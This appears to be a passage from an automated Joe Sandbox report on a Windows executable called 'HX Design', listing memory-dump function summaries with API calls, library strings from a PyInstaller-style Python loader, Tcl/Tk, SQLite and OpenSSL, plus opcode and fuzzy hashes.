Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID:
String ID: $recovered %d frames from WAL file %s
API String ID: 0-3175670447
Opcode ID: 5b39556d8798284ef51883c6a8a336aae58982f94e60b940d7809ca3056fce41
Instruction ID: a8896d9e81364f4bee7f8cfae609693021967478f4a86c92544f53e2bb3f1728
Opcode Fuzzy Hash: 5b39556d8798284ef51883c6a8a336aae58982f94e60b940d7809ca3056fce41
Instruction Fuzzy Hash: 65F19D36B09686C6E764DF29E054B6E7BA4F784B88F014035DA6D97BA8DF38D844CB40

Function 00007FFE003124DC Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 329COMMON

Download Yara Rule

APIs

00007FFE1FFB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFE00363366

Strings

..\s\ssl\statem\extensions_clnt.c, xrefs: 00007FFE0036330E, 00007FFE00363482, 00007FFE003634EE, 00007FFE00363536, 00007FFE00363742, 00007FFE00363780, 00007FFE003637B7
tls_construct_ctos_psk, xrefs: 00007FFE00363302, 00007FFE00363476, 00007FFE003634E2, 00007FFE0036352A, 00007FFE00363736, 00007FFE00363774, 00007FFE003637AB

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_psk
API String ID: 3568877910-446233508
Opcode ID: 7fb5678b9f67f08e663784aae6565b9e065ad5c58e2e1987a57ae2b77471c9e7
Instruction ID: 60d36ad8a9d3559c55883d69b7fa273d01276dd8cf22f4c53d23ea6043b39e41
Opcode Fuzzy Hash: 7fb5678b9f67f08e663784aae6565b9e065ad5c58e2e1987a57ae2b77471c9e7
Instruction Fuzzy Hash: 8AD18AA5B1C68381FA56AA2295503FE5391EF89BC4F148031EF0E47BAECF6DE6418741

Function 00007FF732065830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF732065840
GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF732065852
GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF732065889
GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206589B
GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320658B4
GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320658C6
GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320658DF
GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320658F1
GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206590D
GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206591F
GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206593B
GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206594D
GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF732065969
GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF73206597B
GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF732065997
GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320659A9
GetProcAddress.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320659C5
GetLastError.KERNEL32(?,00007FF7320664CF,?,00007FF73206336E), ref: 00007FF7320659D7

Strings

PyObject_SetAttrString, xrefs: 00007FF732065D81, 00007FF732065DA3
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF732065DDD, 00007FF732065DFF
PyUnicode_Decode, xrefs: 00007FF732065EF1, 00007FF732065F13
GetProcAddress, xrefs: 00007FF732065868
Py_InitializeFromConfig, xrefs: 00007FF732065903, 00007FF732065925
PyConfig_Clear, xrefs: 00007FF73206598D, 00007FF7320659AF
PyModule_GetDict, xrefs: 00007FF732065CC9, 00007FF732065CEB
PyRun_SimpleStringFlags, xrefs: 00007FF732065E0B, 00007FF732065E2D
Py_PreInitialize, xrefs: 00007FF73206595F, 00007FF732065981
PySys_GetObject, xrefs: 00007FF732065E67, 00007FF732065E89
PyImport_AddModule, xrefs: 00007FF732065BE3, 00007FF732065C05
PyObject_Str, xrefs: 00007FF732065DAF, 00007FF732065DD1
Py_Finalize, xrefs: 00007FF7320658D5, 00007FF7320658F7
PyErr_Print, xrefs: 00007FF732065B59, 00007FF732065B7B
PyUnicode_DecodeFSDefault, xrefs: 00007FF732065F1F, 00007FF732065F41
Py_ExitStatusException, xrefs: 00007FF7320658AA, 00007FF7320658CC
PyConfig_SetWideStringList, xrefs: 00007FF732065A73, 00007FF732065A95
PyUnicode_FromFormat, xrefs: 00007FF732065F4D, 00007FF732065F6F
PyObject_GetAttrString, xrefs: 00007FF732065D53, 00007FF732065D75
PyImport_ExecCodeModule, xrefs: 00007FF732065C11, 00007FF732065C33
PyEval_EvalCode, xrefs: 00007FF732065BB5, 00007FF732065BD7
PyUnicode_FromString, xrefs: 00007FF732065F7B, 00007FF732065F9D
PyConfig_InitIsolatedConfig, xrefs: 00007FF7320659BB, 00007FF7320659DD
PyErr_Restore, xrefs: 00007FF732065B87, 00007FF732065BA9
PyObject_CallFunction, xrefs: 00007FF732065CF7, 00007FF732065D19
Py_DecRef, xrefs: 00007FF732065836, 00007FF732065858
PyConfig_SetString, xrefs: 00007FF732065A45, 00007FF732065A67
Py_IsInitialized, xrefs: 00007FF732065931, 00007FF732065953
PyErr_Clear, xrefs: 00007FF732065AA1, 00007FF732065AC3
PyUnicode_AsUTF8, xrefs: 00007FF732065EC3, 00007FF732065EE5
Failed to get address for %hs, xrefs: 00007FF732065861
PyConfig_SetBytesString, xrefs: 00007FF732065A17, 00007FF732065A39
PyErr_Fetch, xrefs: 00007FF732065ACF, 00007FF732065AF1
PyConfig_Read, xrefs: 00007FF7320659E9, 00007FF732065A0B
PyObject_CallFunctionObjArgs, xrefs: 00007FF732065D25, 00007FF732065D47
Py_DecodeLocale, xrefs: 00007FF73206587F, 00007FF7320658A1
PyImport_ImportModule, xrefs: 00007FF732065C3F, 00007FF732065C61
PyMarshal_ReadObjectFromString, xrefs: 00007FF732065C6D, 00007FF732065C8F
PyStatus_Exception, xrefs: 00007FF732065E39, 00007FF732065E5B
PyUnicode_Replace, xrefs: 00007FF732065FD7, 00007FF732065FF9
PyUnicode_Join, xrefs: 00007FF732065FA9, 00007FF732065FCB
PySys_SetObject, xrefs: 00007FF732065E95, 00007FF732065EB7
PyMem_RawFree, xrefs: 00007FF732065C9B, 00007FF732065CBD
PyErr_Occurred, xrefs: 00007FF732065B2B, 00007FF732065B4D
PyErr_NormalizeException, xrefs: 00007FF732065AFD, 00007FF732065B1F

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction ID: 87b93f447fe19313d6a700db50923546ab4e02e049bb92a63ebf0194914f9d58
Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction Fuzzy Hash: DE22A064A09B07B1FA58FB95A8545B6A2B0FF14B55FD41035C82E42AA0FFFCA54CF234

Function 00007FF7320676C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF7320676D7
GetLastError.KERNEL32 ref: 00007FF7320676E9
GetProcAddress.KERNEL32 ref: 00007FF732067725
GetLastError.KERNEL32 ref: 00007FF732067737
GetProcAddress.KERNEL32 ref: 00007FF732067750
GetLastError.KERNEL32 ref: 00007FF732067762
GetProcAddress.KERNEL32 ref: 00007FF73206777B
GetLastError.KERNEL32 ref: 00007FF73206778D
GetProcAddress.KERNEL32 ref: 00007FF7320677A9
GetLastError.KERNEL32 ref: 00007FF7320677BB
GetProcAddress.KERNEL32 ref: 00007FF7320677D7
GetLastError.KERNEL32 ref: 00007FF7320677E9
GetProcAddress.KERNEL32 ref: 00007FF732067805
GetLastError.KERNEL32 ref: 00007FF732067817
GetProcAddress.KERNEL32 ref: 00007FF732067833
GetLastError.KERNEL32 ref: 00007FF732067845
GetProcAddress.KERNEL32 ref: 00007FF732067861
GetLastError.KERNEL32 ref: 00007FF732067873

Strings

Tcl_ConditionNotify, xrefs: 00007FF73206796B, 00007FF73206798D
Tcl_SetVar2Ex, xrefs: 00007FF732067B37, 00007FF732067B59
GetProcAddress, xrefs: 00007FF7320676FF
Tcl_ThreadQueueEvent, xrefs: 00007FF7320679C7, 00007FF7320679E9
Tcl_SetVar2, xrefs: 00007FF732067A51, 00007FF732067A73
Tcl_EvalObjv, xrefs: 00007FF732067BEF, 00007FF732067C11
Tcl_Free, xrefs: 00007FF732067C4B, 00007FF732067C6D
Tcl_EvalFile, xrefs: 00007FF732067B93, 00007FF732067BB5
Tcl_FinalizeThread, xrefs: 00007FF7320677CD, 00007FF7320677EF
Tcl_GetVar2, xrefs: 00007FF732067A23, 00007FF732067A45
Tcl_ThreadAlert, xrefs: 00007FF7320679F5, 00007FF732067A17
Tcl_FindExecutable, xrefs: 00007FF732067746, 00007FF732067768
Tcl_EvalEx, xrefs: 00007FF732067BC1, 00007FF732067BE3
Tcl_Init, xrefs: 00007FF7320676D0, 00007FF7320676EF
Tcl_DoOneEvent, xrefs: 00007FF732067771, 00007FF732067793
Tcl_GetObjResult, xrefs: 00007FF732067B65, 00007FF732067B87
Tcl_GetCurrentThread, xrefs: 00007FF732067857, 00007FF732067879
Tcl_JoinThread, xrefs: 00007FF732067885, 00007FF7320678A7
Tcl_MutexFinalize, xrefs: 00007FF73206790F, 00007FF732067931
Tk_Init, xrefs: 00007FF732067C79, 00007FF732067C9B
Tcl_MutexUnlock, xrefs: 00007FF7320678E1, 00007FF732067903
Tcl_ConditionWait, xrefs: 00007FF732067999, 00007FF7320679BB
Tcl_Alloc, xrefs: 00007FF732067C1D, 00007FF732067C3F
Tcl_CreateThread, xrefs: 00007FF732067829, 00007FF73206784B
Tcl_MutexLock, xrefs: 00007FF7320678B3, 00007FF7320678D5
Tcl_ConditionFinalize, xrefs: 00007FF73206793D, 00007FF73206795F
Failed to get address for %hs, xrefs: 00007FF7320676F8
Tcl_CreateObjCommand, xrefs: 00007FF732067A7F, 00007FF732067AA1
Tcl_NewStringObj, xrefs: 00007FF732067ADB, 00007FF732067AFD
Tcl_DeleteInterp, xrefs: 00007FF7320677FB, 00007FF73206781D
Tcl_Finalize, xrefs: 00007FF73206779F, 00007FF7320677C1
Tk_GetNumMainWindows, xrefs: 00007FF732067CA7, 00007FF732067CC9
Tcl_GetString, xrefs: 00007FF732067AAD, 00007FF732067ACF
Tcl_CreateInterp, xrefs: 00007FF73206771B, 00007FF73206773D
Tcl_NewByteArrayObj, xrefs: 00007FF732067B09, 00007FF732067B2B

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction ID: f5d0253a2f235e63eca7eff849e115442d0b3fb2dbded6db7d7acb36cff9dba5
Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
Instruction Fuzzy Hash: B402C124A09B07B1FA54BB64B8509B6A3A1FF04B54FD41235D83E422A0EFBCB54DF634

Function 00007FF7320681D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF732069390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7320645F4,00000000,00007FF732061985), ref: 00007FF7320693C9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF7320686B7,?,?,00000000,00007FF732063CBB), ref: 00007FF73206822C

Part of subcall function 00007FF732062810: MessageBoxW.USER32 ref: 00007FF7320628EA

Strings

CreateDirectory, xrefs: 00007FF73206837C
\, xrefs: 00007FF732068261
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF732068240
%.*s, xrefs: 00007FF73206830C
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF73206829D
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7320682D9
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF732068373
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF732068203

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
Instruction ID: 964905228b4dafa14bf1a6c678240bb15110a8afe0d74907b583647b33bf960f
Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
Instruction Fuzzy Hash: 7B51A611B19643A1FA50BB25E8956BAE3A0EF84780FC44431D60E826D5FEFCE40CE324

Function 00007FF732061600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to open target file!, xrefs: 00007FF73206165C
fread, xrefs: 00007FF7320617E6
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF7320617CA
fwrite, xrefs: 00007FF7320617D1
Failed to create symbolic link %s!, xrefs: 00007FF732061622
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7320616A2
fseek, xrefs: 00007FF7320616E1
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7320616DA
fopen, xrefs: 00007FF732061663
malloc, xrefs: 00007FF732061749
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7320617DF
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF732061742

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: 2e06f33cb789c1c4285bc897e82d473ee5f193417d7b5bbbaceb79e5ee1fa664
Instruction ID: fd6216224f01b94c8a35ccb1669811369356611b9856f716e9b985dda1a0cd91
Opcode Fuzzy Hash: 2e06f33cb789c1c4285bc897e82d473ee5f193417d7b5bbbaceb79e5ee1fa664
Instruction Fuzzy Hash: 7251A021B08643B2EA10BB25D4001BAE3A0FF84B94FC44531EE9C47B96DEBCE55DE764

Function 00007FFDFB35D610 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 386COMMON

Download Yara Rule

Strings

lib, xrefs: 00007FFDFB35D861
not authorized, xrefs: 00007FFDFB35D683
unable to open shared library [%.*s], xrefs: 00007FFDFB35DC1F
sqlite3_, xrefs: 00007FFDFB35D813
_init, xrefs: 00007FFDFB35D90E
error during initialization: %s, xrefs: 00007FFDFB35D9D6
no entry point [%s] in shared library [%s], xrefs: 00007FFDFB35DAAC
sqlite3_extension_init, xrefs: 00007FFDFB35D69A
%s.%s, xrefs: 00007FFDFB35D6DC

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID:
String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
API String ID: 0-3733955532
Opcode ID: 4828297cf84a1580d1be4d8346d77b2af936a330775195fb116fcdeafb873839
Instruction ID: de5bc1cad1d584587fadb59e3a4e53b3b4f822fafe07b823e39829e1b7e92c6f
Opcode Fuzzy Hash: 4828297cf84a1580d1be4d8346d77b2af936a330775195fb116fcdeafb873839
Instruction Fuzzy Hash: 16029C61B0AA8382EB19AB11A564FB973A0FF85B85F084135CE6E466F8DF3CF555C300

Function 00007FFDFB31B0C0 Relevance: 17.8, APIs: 2, Strings: 8, Instructions: 330COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDFB31B1C3
00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDFB31B2A4

Strings

%lld, xrefs: 00007FFDFB31B361
%!.15g, xrefs: 00007FFDFB31B37E
?, xrefs: 00007FFDFB31B2B8
'%.*q', xrefs: 00007FFDFB31B415
%02x, xrefs: 00007FFDFB31B4C4
NULL, xrefs: 00007FFDFB31B32D
zeroblob(%d), xrefs: 00007FFDFB31B460
-- , xrefs: 00007FFDFB31B153, 00007FFDFB31B172

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
API String ID: 4225454184-875588658
Opcode ID: 2f58605a80ece0dbe873986359c22506b80aa05e97296c1e5264f92375f5e100
Instruction ID: 06a693535ae2e756ca31cb2cfedcfb249647af6a820bf34886ec253f2d71783a
Opcode Fuzzy Hash: 2f58605a80ece0dbe873986359c22506b80aa05e97296c1e5264f92375f5e100
Instruction Fuzzy Hash: F5E1C466F4A553AAFB21DF65D460BBC27E4AB05748F006035DE2E626EDEE3CE445C301

Function 00007FFDFB337760 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 327COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB337AD2

Strings

cannot add a STORED column, xrefs: 00007FFDFB337A72
Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FFDFB3378ED
UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FFDFB337B14
Cannot add a column with non-constant default, xrefs: 00007FFDFB337969
Cannot add a PRIMARY KEY column, xrefs: 00007FFDFB337881
Cannot add a NOT NULL column with default value NULL, xrefs: 00007FFDFB33790F
SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE, xrefs: 00007FFDFB337C5C
Cannot add a UNIQUE column, xrefs: 00007FFDFB33789C
SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FFDFB3378F7, 00007FFDFB337973, 00007FFDFB337A81

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
API String ID: 4225454184-200680935
Opcode ID: 5b4710b465af85f28d42b2c529d5cd9f71a28c578942a5c84c3729e8c5c3be64
Instruction ID: 70e20b2f4b046896666b117807cfe9bbd7d559ae89a3fe29d8c81e567d84a882
Opcode Fuzzy Hash: 5b4710b465af85f28d42b2c529d5cd9f71a28c578942a5c84c3729e8c5c3be64
Instruction Fuzzy Hash: 9BE15921B4AA87C2EB65AB159564FBA63E1FB44B88F084131CE6D077F9DF2CE591C700

Function 00007FFE00311A23 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

